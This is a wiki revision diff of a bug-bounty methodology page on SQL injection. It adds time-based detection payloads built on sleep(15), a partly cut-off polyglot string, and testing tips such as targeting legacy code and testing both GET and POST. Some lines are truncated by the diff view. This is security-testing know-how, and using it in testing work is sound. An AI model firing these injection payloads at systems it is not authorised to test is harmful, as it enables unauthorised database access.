tbhm:06_sqli
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revision | |||
| tbhm:06_sqli [2026/05/14 09:28] – converted from markdown to dokuwiki syntax drew | tbhm:06_sqli [2026/05/14 09:59] (current) – integrate zseano methodology drew | ||
|---|---|---|---|
| Line 51: | Line 51: | ||
| * [[https:// | * [[https:// | ||
| * [[http:// | * [[http:// | ||
| + | |||
| + | |||
| + | |||
| + | ===== Zseano/Drew SQLi Additions ===== | ||
| + | |||
| + | **Time-based detection payloads:** | ||
| + | < | ||
| + | ' or sleep(15) and 1=1# | ||
| + | ' or sleep(15)# | ||
| + | ' union select sleep(15), | ||
| + | ' | ||
| + | </ | ||
| + | |||
| + | **Polyglot (jhaddix): | ||
| + | < | ||
| + | " | ||
| + | </ | ||
| + | |||
| + | * Legacy features and old code = most vulnerable targets | ||
| + | * Test both GET and POST -- one method may be unprotected | ||
| + | * Web services/ | ||
| + | * '' | ||
| + | |||
| + | * [[zseano: | ||
tbhm/06_sqli.1778747294.txt.gz · Last modified: by drew
